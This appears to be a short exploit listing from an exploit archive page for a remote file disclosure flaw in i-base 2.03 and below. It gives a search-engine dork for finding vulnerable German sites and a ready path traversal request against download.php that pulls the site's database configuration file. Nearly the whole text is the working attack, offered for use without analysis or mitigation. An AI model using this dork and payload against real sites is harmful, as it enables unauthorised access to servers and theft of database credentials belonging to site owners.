ibase versions 2.03 and below suffer from a remote file disclosure vulnerability in download.php.
fe43ec1fa0a052b7535851f9cb69cd63Name: [AFD] i-base <= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"
http://[site]/ibase/zubehoer/download.php?filename=[file]
Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php
Comments
No comments yet, be the first!